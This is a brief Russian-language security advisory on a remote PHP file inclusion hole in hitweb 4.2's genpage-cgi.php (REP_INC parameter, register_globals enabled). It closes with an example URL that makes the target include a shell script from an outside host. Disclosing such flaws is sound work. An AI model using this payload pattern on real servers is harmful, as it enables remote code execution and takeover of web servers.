Программа: hitweb 4.2, возможно другие версии.
Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки
входных данных в параметре REP_INC" в
сценарии genpage-cgi.php. Удаленный пользователь
может выполнить произвольный PHP сценарий на
целевой системе с привилегиями Web сервера.
Для удачной эксплуатации уязвимости опция
"register_globals" должна быть включена в
конфигурационном файле PHP.
Пример:
http://victim/dir_hitweb/genpage-cgi.php?REP_INC=http://www.evalsite.com/shell.php?